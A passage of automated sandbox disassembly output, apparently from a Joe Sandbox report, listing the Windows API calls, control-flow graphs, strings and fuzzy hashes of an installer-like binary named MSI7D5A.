                                                        • Part of subcall function 00A41F80: LocalAlloc.KERNELBASE(00000040,00000000,?,?,vector too long,00A44251,838A949E,00000000,?,00000000,?,?,?,00A84400,000000FF,?), ref: 00A41F9D
                                                      • ExitProcess.KERNEL32 ref: 00A4CEB1
                                                        • Part of subcall function 00A46600: CreateFileW.KERNEL32(00000000,40000000,00000000,00000000,00000002,00000080,00000000,?), ref: 00A4667E
                                                      Strings
                                                      Memory Dump Source
                                                      • Source File: 00000006.00000002.2085090627.0000000000A41000.00000020.00000001.01000000.00000003.sdmp, Offset: 00A40000, based on PE: true
                                                      • Associated: 00000006.00000002.2085076632.0000000000A40000.00000002.00000001.01000000.00000003.sdmp
                                                      • Associated: 00000006.00000002.2085115089.0000000000A87000.00000002.00000001.01000000.00000003.sdmp
                                                      • Associated: 00000006.00000002.2085130397.0000000000A9C000.00000004.00000001.01000000.00000003.sdmp
                                                      • Associated: 00000006.00000002.2085148614.0000000000AA0000.00000002.00000001.01000000.00000003.sdmp
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_6_2_a40000_MSI7D5A.jbxd
                                                      Similarity
                                                      • API ID: AllocCommandCreateExitFileLineLocalProcess
                                                      • String ID: Full command line:
                                                      • API String ID: 1878577176-831861440
                                                      • Opcode ID: bf0731009c51425501db90366b6e99ade68f1654792c54d71786853d37412d32
                                                      • Instruction ID: 80df2e9a540059924a9b8134f4e270dacaad6938a2562f3ff8ed149958268a36
                                                      • Opcode Fuzzy Hash: bf0731009c51425501db90366b6e99ade68f1654792c54d71786853d37412d32
                                                      • Instruction Fuzzy Hash: A0214438A10114ABCB04FBB0CE02BEE73B1AF81750F144128F406AB282EF745F09C792
                                                      Uniqueness

                                                      Uniqueness Score: -1.00%

                                                      Control-flow Graph

                                                      • Executed
                                                      • Not Executed
                                                      control_flow_graph 289 a45e40-a45ebc GetTokenInformation 290 a45f20-a45f33 289->290 291 a45ebe-a45ec7 GetLastError 289->291 291->290 292 a45ec9-a45ed7 291->292 293 a45ede 292->293 294 a45ed9-a45edc 292->294 296 a45ee0-a45ee7 293->296 297 a45f0e-a45f1a GetTokenInformation 293->297 295 a45f0b 294->295 295->297 298 a45ef7-a45f08 call a64080 296->298 299 a45ee9-a45ef5 call a460d0 296->299 297->290 298->295 299->297
                                                      APIs
                                                      • GetTokenInformation.KERNELBASE(?,00000001(TokenIntegrityLevel),00000000,00000000,00A45E18,838A949E,?), ref: 00A45EB4
                                                      • GetLastError.KERNEL32(?,TokenIntegrityLevel,00000000,00000000,00A45E18,838A949E,?), ref: 00A45EBE
                                                      • GetTokenInformation.KERNELBASE(?,00000001(TokenIntegrityLevel),?,00000000,00000000,?,TokenIntegrityLevel,00000000,00000000,00A45E18,838A949E,?), ref: 00A45F1A
                                                      Memory Dump Source
                                                      • Source File: 00000006.00000002.2085090627.0000000000A41000.00000020.00000001.01000000.00000003.sdmp, Offset: 00A40000, based on PE: true
                                                      • Associated: 00000006.00000002.2085076632.0000000000A40000.00000002.00000001.01000000.00000003.sdmp
                                                      • Associated: 00000006.00000002.2085115089.0000000000A87000.00000002.00000001.01000000.00000003.sdmp
                                                      • Associated: 00000006.00000002.2085130397.0000000000A9C000.00000004.00000001.01000000.00000003.sdmp
                                                      • Associated: 00000006.00000002.2085148614.0000000000AA0000.00000002.00000001.01000000.00000003.sdmp
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_6_2_a40000_MSI7D5A.jbxd
                                                      Similarity
                                                      • API ID: InformationToken$ErrorLast
                                                      • String ID:
                                                      • API String ID: 2567405617-0
                                                      • Opcode ID: 9840868ceeae4dce69fd208e0c0e5036c4aacb435b65ce280fbcc48999814e49
                                                      • Instruction ID: 98bf346e195de70f498104ccaa6930bc11201ecad76538cf2cfecc2645a198a0
                                                      • Opcode Fuzzy Hash: 9840868ceeae4dce69fd208e0c0e5036c4aacb435b65ce280fbcc48999814e49
                                                      • Instruction Fuzzy Hash: BD318F71A00605EFDB10CFA9CD45BAFBBF9FB84B10F20452EF415A7280D7B5A9048BA1
                                                      Uniqueness

                                                      Uniqueness Score: -1.00%

                                                      Control-flow Graph

                                                      • Executed
                                                      • Not Executed
                                                      control_flow_graph 304 a770bb-a770c6 305 a770d4-a770da 304->305 306 a770c8-a770d2 304->306 308 a770f3-a77104 RtlAllocateHeap 305->308 309 a770dc-a770dd 305->309 306->305 307 a77108-a77113 call a67370 306->307 313 a77115-a77117 307->313 311 a77106 308->311 312 a770df-a770e6 call a75245 308->312 309->308 311->313 312->307 317 a770e8-a770f1 call a7bf83 312->317 317->307 317->308
                                                      APIs
                                                      • RtlAllocateHeap.NTDLL(00000008,?,?,?,00A7596A,00000001,00000364,?,00000006,000000FF,?,00A66CE7,00000000,00A73841,00000000), ref: 00A770FC
                                                      Memory Dump Source
                                                      • Source File: 00000006.00000002.2085090627.0000000000A41000.00000020.00000001.01000000.00000003.sdmp, Offset: 00A40000, based on PE: true
                                                      • Associated: 00000006.00000002.2085076632.0000000000A40000.00000002.00000001.01000000.00000003.sdmp
                                                      • Associated: 00000006.00000002.2085115089.0000000000A87000.00000002.00000001.01000000.00000003.sdmp
                                                      • Associated: 00000006.00000002.2085130397.0000000000A9C000.00000004.00000001.01000000.00000003.sdmp
                                                      • Associated: 00000006.00000002.2085148614.0000000000AA0000.00000002.00000001.01000000.00000003.sdmp
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_6_2_a40000_MSI7D5A.jbxd
                                                      Similarity
                                                      • API ID: AllocateHeap
                                                      • String ID:
                                                      • API String ID: 1279760036-0
                                                      • Opcode ID: 088e7a7c2eb70129b711a82543d0f50642a57262693666dde6c7579d121002ea
                                                      • Instruction ID: 78dab4a9278afda405d96d22dd3e3099a302cce219eb0ca3d90cfa81b77b7724
                                                      • Opcode Fuzzy Hash: 088e7a7c2eb70129b711a82543d0f50642a57262693666dde6c7579d121002ea
                                                      • Instruction Fuzzy Hash: 7BF0BE3264C2206A9B22DB669D01B6E7769AB517B0B14C221FD1C9A1A0CA20EC0287E1
                                                      Uniqueness

                                                      Uniqueness Score: -1.00%

                                                      Control-flow Graph

                                                      • Executed
                                                      • Not Executed
                                                      control_flow_graph 320 a45940-a4596f 321 a45971-a4597f 320->321 322 a4598f-a459a0 320->322 323 a45981-a45982 FindCloseChangeNotification 321->323 324 a45988 321->324 323->324 324->322
                                                      APIs
                                                      • FindCloseChangeNotification.KERNELBASE(?,838A949E,00000000,?,?,?), ref: 00A45982
                                                      Memory Dump Source
                                                      • Source File: 00000006.00000002.2085090627.0000000000A41000.00000020.00000001.01000000.00000003.sdmp, Offset: 00A40000, based on PE: true
                                                      • Associated: 00000006.00000002.2085076632.0000000000A40000.00000002.00000001.01000000.00000003.sdmp
                                                      • Associated: 00000006.00000002.2085115089.0000000000A87000.00000002.00000001.01000000.00000003.sdmp
                                                      • Associated: 00000006.00000002.2085130397.0000000000A9C000.00000004.00000001.01000000.00000003.sdmp
                                                      • Associated: 00000006.00000002.2085148614.0000000000AA0000.00000002.00000001.01000000.00000003.sdmp
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_6_2_a40000_MSI7D5A.jbxd
                                                      Similarity
                                                      • API ID: ChangeCloseFindNotification
                                                      • String ID:
                                                      • API String ID: 2591292051-0
                                                      • Opcode ID: 2157186ea7c431da62ebf6b070ab0e2b3310c041b4a60df78dd0aaeadb60aef0
                                                      • Instruction ID: 4eb14b6b74734a71d6d6a765fa5b0e4c75fbdd2ecd968d27db249468f8b408e0
                                                      • Opcode Fuzzy Hash: 2157186ea7c431da62ebf6b070ab0e2b3310c041b4a60df78dd0aaeadb60aef0
                                                      • Instruction Fuzzy Hash: 0BF0CD75A04A48EFC710DFA9D940B5AFBF8EB05730F1042AAF810D7690E73698008BA0
                                                      Uniqueness

                                                      Uniqueness Score: -1.00%

                                                      Control-flow Graph

                                                      • Executed
                                                      • Not Executed
                                                      control_flow_graph 325 a41f80-a41faf LocalAlloc
                                                      APIs
                                                      • LocalAlloc.KERNELBASE(00000040,00000000,?,?,vector too long,00A44251,838A949E,00000000,?,00000000,?,?,?,00A84400,000000FF,?), ref: 00A41F9D
                                                      Memory Dump Source
                                                      • Source File: 00000006.00000002.2085090627.0000000000A41000.00000020.00000001.01000000.00000003.sdmp, Offset: 00A40000, based on PE: true
                                                      • Associated: 00000006.00000002.2085076632.0000000000A40000.00000002.00000001.01000000.00000003.sdmp
                                                      • Associated: 00000006.00000002.2085115089.0000000000A87000.00000002.00000001.01000000.00000003.sdmp
                                                      • Associated: 00000006.00000002.2085130397.0000000000A9C000.00000004.00000001.01000000.00000003.sdmp
                                                      • Associated: 00000006.00000002.2085148614.0000000000AA0000.00000002.00000001.01000000.00000003.sdmp
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_6_2_a40000_MSI7D5A.jbxd
                                                      Similarity
                                                      • API ID: AllocLocal
                                                      • String ID:
                                                      • API String ID: 3494564517-0
                                                      • Opcode ID: 7f4feff6f4d7fe17018e1cc3b7c726d37079638aeb3a751a461d36fe8aaee0de
                                                      • Instruction ID: 0f78f8dda7b5fc6095198ec3b2abd7be6c1bb5bbf8533223d6719f3a1f76c8b0
                                                      • Opcode Fuzzy Hash: 7f4feff6f4d7fe17018e1cc3b7c726d37079638aeb3a751a461d36fe8aaee0de
                                                      • Instruction Fuzzy Hash: 57D02BB23012125FD3044B2CD80BB1BE698AF84710F00C53FB505C72D4CA70CC014760
                                                      Uniqueness

                                                      Uniqueness Score: -1.00%

                                                      APIs
                                                        • Part of subcall function 00A457C0: GetCurrentProcess.KERNEL32(00000008,?,838A949E,?,-00000010), ref: 00A457D0
                                                        • Part of subcall function 00A457C0: OpenProcessToken.ADVAPI32(00000000), ref: 00A457D7
                                                      • CoInitialize.OLE32(00000000), ref: 00A44C15
                                                      • CoCreateInstance.OLE32(00A872B0,00000000,00000004,00A95104,00000000,?), ref: 00A44C45
                                                      • CoUninitialize.OLE32 ref: 00A45187
                                                      • _com_issue_error.COMSUPP ref: 00A451B5
                                                      Memory Dump Source
                                                      • Source File: 00000006.00000002.2085090627.0000000000A41000.00000020.00000001.01000000.00000003.sdmp, Offset: 00A40000, based on PE: true
                                                      • Associated: 00000006.00000002.2085076632.0000000000A40000.00000002.00000001.01000000.00000003.sdmp
                                                      • Associated: 00000006.00000002.2085115089.0000000000A87000.00000002.00000001.01000000.00000003.sdmp
                                                      • Associated: 00000006.00000002.2085130397.0000000000A9C000.00000004.00000001.01000000.00000003.sdmp
                                                      • Associated: 00000006.00000002.2085148614.0000000000AA0000.00000002.00000001.01000000.00000003.sdmp
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_6_2_a40000_MSI7D5A.jbxd
                                                      Similarity
                                                      • API ID: Process$CreateCurrentInitializeInstanceOpenTokenUninitialize_com_issue_error
                                                      • String ID:
                                                      • API String ID: 928366108-0
                                                      • Opcode ID: ce93a4e2dbb6c64dad97a4000d998de71df96f9a914da2d90529e7a7e5507be8
                                                      • Instruction ID: a5eed8b1bda8a6bfcd2a1a6d025f3292e2ae99a0b2a28fe16ce53cc4393f558b
                                                      • Opcode Fuzzy Hash: ce93a4e2dbb6c64dad97a4000d998de71df96f9a914da2d90529e7a7e5507be8
                                                      • Instruction Fuzzy Hash: AB22AE74E04388DFEF11DFB8C948BADBBB4AF89304F248199E405EB281D7759A45CB61
                                                      Uniqueness

                                                      Uniqueness Score: -1.00%

                                                      APIs
                                                      • RegOpenKeyExW.ADVAPI32(?,?,00000000,00000001,?), ref: 00A4CBB6
                                                      • RegQueryValueExW.ADVAPI32(?,?,00000000,00000000,00A9E6D0,00000800), ref: 00A4CBD3
                                                      Strings
                                                      Memory Dump Source
                                                      • Source File: 00000006.00000002.2085090627.0000000000A41000.00000020.00000001.01000000.00000003.sdmp, Offset: 00A40000, based on PE: true
                                                      Similarity
                                                      • API ID: OpenQueryValue
                                                      • String ID: /DIR $/DontWait $/EnforcedRunAsAdmin $/HideWindow$/LogFile$/RunAsAdmin
                                                      Uniqueness

                                                      Uniqueness Score: -1.00%

                                                      APIs
                                                        • Part of subcall function 00A757CC: GetLastError.KERNEL32(?,00000008,00A7AD4C), ref: 00A757D0
                                                        • Part of subcall function 00A757CC: SetLastError.KERNEL32(00000000,00000000,00000006,000000FF), ref: 00A75872
                                                      • GetACP.KERNEL32(?,?,?,?,?,?,00A742D9,?,?,?,00000055,?,-00000050,?,?,00000004), ref: 00A7DEE5
                                                      • IsValidCodePage.KERNEL32(00000000,?,?,?,?,?,?,00A742D9,?,?,?,00000055,?,-00000050,?,?), ref: 00A7DF10
                                                      • _wcschr.LIBVCRUNTIME ref: 00A7DFA4
                                                      • _wcschr.LIBVCRUNTIME ref: 00A7DFB2
                                                      • GetLocaleInfoW.KERNEL32(00000000,?,?,00000078,-00000050,00000000,000000D0), ref: 00A7E073
                                                      Strings
                                                      Memory Dump Source
                                                      • Source File: 00000006.00000002.2085090627.0000000000A41000.00000020.00000001.01000000.00000003.sdmp, Offset: 00A40000, based on PE: true
                                                      Similarity
                                                      • API ID: ErrorLast_wcschr$CodeInfoLocalePageValid
                                                      • String ID: utf8
                                                      Uniqueness

                                                      Uniqueness Score: -1.00%

                                                      APIs
                                                      • CreateToolhelp32Snapshot.KERNEL32(00000002,00000000), ref: 00A438CB
                                                      • CloseHandle.KERNEL32(00000000), ref: 00A4390B
                                                      • Process32FirstW.KERNEL32(?,00000000), ref: 00A4395F
                                                      • OpenProcess.KERNEL32(00000410,00000000,?), ref: 00A4397A
                                                      • CloseHandle.KERNEL32(00000000), ref: 00A43A8E
                                                      • Process32NextW.KERNEL32(?,00000000), ref: 00A43AA2
                                                      • CloseHandle.KERNEL32(?), ref: 00A43AF0
                                                      Memory Dump Source
                                                      • Source File: 00000006.00000002.2085090627.0000000000A41000.00000020.00000001.01000000.00000003.sdmp, Offset: 00A40000, based on PE: true
                                                      Similarity
                                                      • API ID: CloseHandle$Process32$CreateFirstNextOpenProcessSnapshotToolhelp32
                                                      • String ID:
                                                      Uniqueness

                                                      Uniqueness Score: -1.00%

                                                      APIs
                                                      Strings
                                                      Memory Dump Source
                                                      • Source File: 00000006.00000002.2085090627.0000000000A41000.00000020.00000001.01000000.00000003.sdmp, Offset: 00A40000, based on PE: true
                                                      Similarity
                                                      • API ID: __floor_pentium4
                                                      • String ID: 1#IND$1#INF$1#QNAN$1#SNAN
                                                      Uniqueness

                                                      Uniqueness Score: -1.00%

                                                      APIs
                                                      • GetLocaleInfoW.KERNEL32(?,2000000B,00A7E8D1,00000002,00000000,?,?,?,00A7E8D1,?,00000000), ref: 00A7E64C
                                                      • GetLocaleInfoW.KERNEL32(?,20001004,00A7E8D1,00000002,00000000,?,?,?,00A7E8D1,?,00000000), ref: 00A7E675
                                                      • GetACP.KERNEL32(?,?,00A7E8D1,?,00000000), ref: 00A7E68A
                                                      Strings
                                                      Memory Dump Source
                                                      • Source File: 00000006.00000002.2085090627.0000000000A41000.00000020.00000001.01000000.00000003.sdmp, Offset: 00A40000, based on PE: true
                                                      Similarity
                                                      • API ID: InfoLocale
                                                      • String ID: ACP$OCP
                                                      Uniqueness

                                                      Uniqueness Score: -1.00%

                                                      APIs
                                                      Memory Dump Source
                                                      • Source File: 00000006.00000002.2085090627.0000000000A41000.00000020.00000001.01000000.00000003.sdmp, Offset: 00A40000, based on PE: true
                                                      Similarity
                                                      • API ID: _swprintf$FreeLocal
                                                      • String ID:
                                                      Uniqueness

                                                      Uniqueness Score: -1.00%

                                                      APIs
                                                        • Part of subcall function 00A757CC: GetLastError.KERNEL32(?,00000008,00A7AD4C), ref: 00A757D0
                                                        • Part of subcall function 00A757CC: SetLastError.KERNEL32(00000000,00000000,00000006,000000FF), ref: 00A75872
                                                      • GetUserDefaultLCID.KERNEL32(?,?,?,00000055,?), ref: 00A7E894
                                                      • IsValidCodePage.KERNEL32(00000000), ref: 00A7E8DD
                                                      • IsValidLocale.KERNEL32(?,00000001), ref: 00A7E8EC
                                                      • GetLocaleInfoW.KERNEL32(?,00001001,-00000050,00000040,?,000000D0,00000055,00000000,?,?,00000055,00000000), ref: 00A7E934
                                                      • GetLocaleInfoW.KERNEL32(?,00001002,00000030,00000040), ref: 00A7E953
                                                      Memory Dump Source
                                                      • Source File: 00000006.00000002.2085090627.0000000000A41000.00000020.00000001.01000000.00000003.sdmp, Offset: 00A40000, based on PE: true
                                                      Similarity
                                                      • API ID: Locale$ErrorInfoLastValid$CodeDefaultPageUser
                                                      • String ID:
                                                      Uniqueness

                                                      Uniqueness Score: -1.00%

                                                      APIs
                                                      Memory Dump Source
                                                      • Source File: 00000006.00000002.2085090627.0000000000A41000.00000020.00000001.01000000.00000003.sdmp, Offset: 00A40000, based on PE: true
                                                      Similarity
                                                      • API ID: _strrchr
                                                      • String ID:
                                                      Uniqueness

                                                      Uniqueness Score: -1.00%

                                                      APIs
                                                      • IsProcessorFeaturePresent.KERNEL32(00000017), ref: 00A633B4
                                                      • IsDebuggerPresent.KERNEL32 ref: 00A63480
                                                      • SetUnhandledExceptionFilter.KERNEL32(00000000), ref: 00A634A0
                                                      • UnhandledExceptionFilter.KERNEL32(?), ref: 00A634AA
                                                      Memory Dump Source
                                                      • Source File: 00000006.00000002.2085090627.0000000000A41000.00000020.00000001.01000000.00000003.sdmp, Offset: 00A40000, based on PE: true
                                                      Similarity
                                                      • API ID: ExceptionFilterPresentUnhandled$DebuggerFeatureProcessor
                                                      • String ID:
                                                      Uniqueness

                                                      Uniqueness Score: -1.00%

                                                      APIs
                                                        • Part of subcall function 00A4C630: InitializeCriticalSectionEx.KERNEL32(?,00000000,00000000,838A949E,?,00A83D30,000000FF), ref: 00A4C657
                                                        • Part of subcall function 00A4C630: GetLastError.KERNEL32(?,00000000,00000000,838A949E,?,00A83D30,000000FF), ref: 00A4C661
                                                      • IsDebuggerPresent.KERNEL32(?,?,00A98AF0), ref: 00A4D0D8
                                                      • OutputDebugStringW.KERNEL32(ERROR : Unable to initialize critical section in CAtlBaseModule,?,?,00A98AF0), ref: 00A4D0E7
                                                      Strings
                                                      • ERROR : Unable to initialize critical section in CAtlBaseModule, xrefs: 00A4D0E2
                                                      Memory Dump Source
                                                      • Source File: 00000006.00000002.2085090627.0000000000A41000.00000020.00000001.01000000.00000003.sdmp, Offset: 00A40000, based on PE: true
                                                      Similarity
                                                      • API ID: CriticalDebugDebuggerErrorInitializeLastOutputPresentSectionString
                                                      • String ID: ERROR : Unable to initialize critical section in CAtlBaseModule
                                                      Uniqueness

                                                      Uniqueness Score: -1.00%

                                                      APIs
                                                        • Part of subcall function 00A757CC: GetLastError.KERNEL32(?,00000008,00A7AD4C), ref: 00A757D0
                                                        • Part of subcall function 00A757CC: SetLastError.KERNEL32(00000000,00000000,00000006,000000FF), ref: 00A75872
                                                      • GetLocaleInfoW.KERNEL32(00000000,?,?,00000078), ref: 00A7E28B
                                                      • GetLocaleInfoW.KERNEL32(00000000,?,?,00000078), ref: 00A7E2D5
                                                      • GetLocaleInfoW.KERNEL32(00000000,?,?,00000078), ref: 00A7E39B
                                                      Memory Dump Source
                                                      • Source File: 00000006.00000002.2085090627.0000000000A41000.00000020.00000001.01000000.00000003.sdmp, Offset: 00A40000, based on PE: true
                                                      Similarity
                                                      • API ID: InfoLocale$ErrorLast
                                                      • String ID:
                                                      Uniqueness

                                                      Uniqueness Score: -1.00%

                                                      APIs
                                                      • IsDebuggerPresent.KERNEL32(?,?,?,?,?,00000000), ref: 00A66F13
                                                      • SetUnhandledExceptionFilter.KERNEL32(00000000,?,?,?,?,?,00000000), ref: 00A66F1D
                                                      • UnhandledExceptionFilter.KERNEL32(?,?,?,?,?,?,00000000), ref: 00A66F2A
                                                      Memory Dump Source
                                                      • Source File: 00000006.00000002.2085090627.0000000000A41000.00000020.00000001.01000000.00000003.sdmp, Offset: 00A40000, based on PE: true
                                                      Similarity
                                                      • API ID: ExceptionFilterUnhandled$DebuggerPresent
                                                      • String ID:
                                                      Uniqueness

                                                      Uniqueness Score: -1.00%

                                                      APIs
                                                      • LoadResource.KERNEL32(00000000,00000000,838A949E,00000001,00000000,?,00000000,00A84460,000000FF,?,00A4474D,00A43778,?,00000000,00000000,?), ref: 00A445DB
                                                      • LockResource.KERNEL32(00000000,?,00000000,00A84460,000000FF,?,00A4474D,00A43778,?,00000000,00000000,?,?,?,?,00A43778), ref: 00A445E6
                                                      • SizeofResource.KERNEL32(00000000,00000000,?,00000000,00A84460,000000FF,?,00A4474D,00A43778,?,00000000,00000000,?,?,?), ref: 00A445F4
                                                      Similarity
                                                      • API ID: Resource$LoadLockSizeof
                                                      • String ID:
                                                      • API String ID: 2853612939-0
                                                      • Opcode ID: 614d04dd60831168391c58703a34ccd4e9704fe84813996c654944092166ec13
                                                      • Instruction ID: d78737ec7dc9b9c4cefd3b4f0e2f519197d5a7e21c052b5c97fdfc66beff6fd4
                                                      • Opcode Fuzzy Hash: 614d04dd60831168391c58703a34ccd4e9704fe84813996c654944092166ec13
                                                      • Instruction Fuzzy Hash: D111C636A046959BC735CF59DC44B6AF7FCE7CA725F11092AEC1AD3240EA359C008690
                                                      Uniqueness

                                                      Uniqueness Score: -1.00%

                                                      Similarity
                                                      • API ID:
                                                      • String ID:
                                                      • API String ID:
                                                      • Opcode ID: c3b8607f755f17a23646f2bf370a959f638319f8f7f89048cc653de111095432
                                                      • Instruction ID: b3cff35fec4ed313700e6567d0fd22db4c682762c9cfd26866d5dbe332da3913
                                                      • Opcode Fuzzy Hash: c3b8607f755f17a23646f2bf370a959f638319f8f7f89048cc653de111095432
                                                      • Instruction Fuzzy Hash: D5F14F75E002199FDF14CFA9C984AADB7B1FF98324F158269E815AB381D731AE05CF90
                                                      Uniqueness

                                                      Uniqueness Score: -1.00%

                                                      APIs
                                                      • GetTimeZoneInformation.KERNEL32(00000000,00000000,00000000,00000000,00000000,00000000,?,?,?,00A77F64,00000000,00000000,00000000), ref: 00A77E23
                                                      Similarity
                                                      • API ID: InformationTimeZone
                                                      • String ID:
                                                      • API String ID: 565725191-0
                                                      • Opcode ID: 2942d7baeb8e619a769d37fa604f4b3672018a04632cf67272e82ea668159824
                                                      • Instruction ID: 4d472822cb32624ef34251516b574faf0e6c4e472ed3550069e1e72bcfd6ea55
                                                      • Opcode Fuzzy Hash: 2942d7baeb8e619a769d37fa604f4b3672018a04632cf67272e82ea668159824
                                                      • Instruction Fuzzy Hash: C6C13B72E04215ABDB20EFA4DD02ABE77B9EF44750F15C056F909EB291E7309E41CB90
                                                      Uniqueness

                                                      Uniqueness Score: -1.00%

                                                      APIs
                                                      • RaiseException.KERNEL32(C000000D,00000000,00000001,?,?,00000008,?,?,00A784B8,?,?,00000008,?,?,00A814E4,00000000), ref: 00A786EA
                                                      Similarity
                                                      • API ID: ExceptionRaise
                                                      • String ID:
                                                      • API String ID: 3997070919-0
                                                      • Opcode ID: 47b2bafacb6e252df5bb92428533e2039aec32c0e8ee3a254c4db01e7634c7e6
                                                      • Instruction ID: 18236acc1e7fce9ddf6a9269fdf30e88bebb433b62b78506dc49e0d22b438dbf
                                                      • Opcode Fuzzy Hash: 47b2bafacb6e252df5bb92428533e2039aec32c0e8ee3a254c4db01e7634c7e6
                                                      • Instruction Fuzzy Hash: D0B15B31650608DFD718CF28C88AB657BA0FF45364F25C658E99ECF2A1CB39E981CB40
                                                      Uniqueness

                                                      Uniqueness Score: -1.00%

                                                      APIs
                                                      • IsProcessorFeaturePresent.KERNEL32(0000000A), ref: 00A635BF
                                                      Similarity
                                                      • API ID: FeaturePresentProcessor
                                                      • String ID:
                                                      • API String ID: 2325560087-0
                                                      • Opcode ID: 8e67c476f9f907385f6470cdde7fd1400e8a5f7238f1b15e66f6c969d82f9886
                                                      • Instruction ID: 1a73ab571de6fd45da3aba12866d4fe85e26000a3213a6394040a6f9fbffed14
                                                      • Opcode Fuzzy Hash: 8e67c476f9f907385f6470cdde7fd1400e8a5f7238f1b15e66f6c969d82f9886
                                                      • Instruction Fuzzy Hash: 73519BB2A11605DFEB16CF99E8817AEBBF0FB48354F24852AC405EB350D7749A42CF90
                                                      Uniqueness

                                                      Uniqueness Score: -1.00%

                                                      Similarity
                                                      • API ID:
                                                      • String ID:
                                                      • API String ID:
                                                      • Opcode ID: f18edd2263d6237677bf8f55b2c4f358becb9ed7859a74e53a1e55ce24079f50
                                                      • Instruction ID: c48699ded833150faa3e013e77008dfbcfa778546a0c07590d1f005ec5bccc38
                                                      • Opcode Fuzzy Hash: f18edd2263d6237677bf8f55b2c4f358becb9ed7859a74e53a1e55ce24079f50
                                                      • Instruction Fuzzy Hash: 9431A6B2900219AFCB20DFA9CD89ABFB77DEB84350F14C159F91997244EA319D418B64
                                                      Uniqueness

                                                      Uniqueness Score: -1.00%

                                                      Strings
                                                      Similarity
                                                      • API ID:
                                                      • String ID: 0
                                                      • API String ID: 0-4108050209
                                                      • Opcode ID: bbf5afa6794cb6adee4ae3de000821c3e4eae1e410342beadca30223ef8dd994
                                                      • Instruction ID: 4b8cb919634827a54f1d5f994c9a191352bd0bb9dab54d2d0ad375aef6661d46
                                                      • Opcode Fuzzy Hash: bbf5afa6794cb6adee4ae3de000821c3e4eae1e410342beadca30223ef8dd994
                                                      • Instruction Fuzzy Hash: 36C1CD74A006468FCB28CF68C5906BEBBB2BF65310F284619D597EB291C731ED46CF52
                                                      Uniqueness

                                                      Uniqueness Score: -1.00%

                                                      APIs
                                                        • Part of subcall function 00A757CC: GetLastError.KERNEL32(?,00000008,00A7AD4C), ref: 00A757D0
                                                        • Part of subcall function 00A757CC: SetLastError.KERNEL32(00000000,00000000,00000006,000000FF), ref: 00A75872
                                                      • GetLocaleInfoW.KERNEL32(00000000,?,?,00000078), ref: 00A7E4DE
                                                      Similarity
                                                      • API ID: ErrorLast$InfoLocale
                                                      • String ID:
                                                      • API String ID: 3736152602-0
                                                      • Opcode ID: bbdaf4bf7e4e00bab641f753c05670ac64ffb98c2a88938c31c43cd8f47eadb6
                                                      • Instruction ID: f2c2e99c115cd44f67e6244c9989987fdfd1ae3c0c16e876b48e6900f2c896b7
                                                      • Opcode Fuzzy Hash: bbdaf4bf7e4e00bab641f753c05670ac64ffb98c2a88938c31c43cd8f47eadb6
                                                      • Instruction Fuzzy Hash: 9821807265420AABDB28DB25DD41ABA73ACEF49718F14C0BAF909C6151FB74ED008750
                                                      Uniqueness

                                                      Uniqueness Score: -1.00%

                                                      APIs
                                                        • Part of subcall function 00A757CC: GetLastError.KERNEL32(?,00000008,00A7AD4C), ref: 00A757D0
                                                        • Part of subcall function 00A757CC: SetLastError.KERNEL32(00000000,00000000,00000006,000000FF), ref: 00A75872
                                                      • EnumSystemLocalesW.KERNEL32(00A7E237,00000001,00000000,?,-00000050,?,00A7E868,00000000,?,?,?,00000055,?), ref: 00A7E183
                                                      Similarity
                                                      • API ID: ErrorLast$EnumLocalesSystem
                                                      • String ID:
                                                      • API String ID: 2417226690-0
                                                      • Opcode ID: 5176bf12329f92232a8fdc06fd0d0d666c2f3f3e8184a54e60a4f03b2d2aae0c
                                                      • Instruction ID: 2b49c65f580805dd733f050f472ba23048c431bd6f7083458991bbeab973b307
                                                      • Opcode Fuzzy Hash: 5176bf12329f92232a8fdc06fd0d0d666c2f3f3e8184a54e60a4f03b2d2aae0c
                                                      • Instruction Fuzzy Hash: 6C11C63A2007019FDB18DF398C915BAB795FB88759B55C52CE54A47A40D771A942CB40
                                                      Uniqueness

                                                      Uniqueness Score: -1.00%

                                                      APIs
                                                        • Part of subcall function 00A757CC: GetLastError.KERNEL32(?,00000008,00A7AD4C), ref: 00A757D0
                                                        • Part of subcall function 00A757CC: SetLastError.KERNEL32(00000000,00000000,00000006,000000FF), ref: 00A75872
                                                      • GetLocaleInfoW.KERNEL32(?,20000001,?,00000002,?,00000000,?,?,00A7E453,00000000,00000000,?), ref: 00A7E6E5
                                                      Similarity
                                                      • API ID: ErrorLast$InfoLocale
                                                      • String ID:
                                                      • API String ID: 3736152602-0
                                                      • Opcode ID: 285d71cc9c45deafcdffbc9e411bddd2d9dbb603e5186b40f789fa88f6d50211
                                                      • Instruction ID: 0a2cf3719510237614b616c8ae3fc422764b53a2c364cd42a5eb6093f7211777
                                                      • Opcode Fuzzy Hash: 285d71cc9c45deafcdffbc9e411bddd2d9dbb603e5186b40f789fa88f6d50211
                                                      • Instruction Fuzzy Hash: 88F0CD36A00212BBDB2CD764CD49BBA776CFB44754F15C8A4EC19A3580EA74FD41C6D4
                                                      Uniqueness

                                                      Uniqueness Score: -1.00%

                                                      APIs
                                                        • Part of subcall function 00A757CC: GetLastError.KERNEL32(?,00000008,00A7AD4C), ref: 00A757D0
                                                        • Part of subcall function 00A757CC: SetLastError.KERNEL32(00000000,00000000,00000006,000000FF), ref: 00A75872
                                                      • EnumSystemLocalesW.KERNEL32(00A7E48A,00000001,?,?,-00000050,?,00A7E82C,-00000050,?,?,?,00000055,?,-00000050,?,?), ref: 00A7E1F6
                                                      Similarity
                                                      • API ID: ErrorLast$EnumLocalesSystem
                                                      • String ID:
                                                      • API String ID: 2417226690-0
                                                      • Opcode ID: d0efaaa054ba1697254cc1d7ec5a1b85ec5a9f7900a326801f5d544b2e8c8139
                                                      • Instruction ID: 810c88ff35b7d4e271fa167ed530796d45c0d4ffdfe0c9ae266e85e4985e9376
                                                      • Opcode Fuzzy Hash: d0efaaa054ba1697254cc1d7ec5a1b85ec5a9f7900a326801f5d544b2e8c8139
                                                      • Instruction Fuzzy Hash: 86F046363003046FCB249F348C85A7A7B98FF84728F04C46CF9098BA90D6B19C42CB50
                                                      Uniqueness

                                                      Uniqueness Score: -1.00%

                                                      APIs
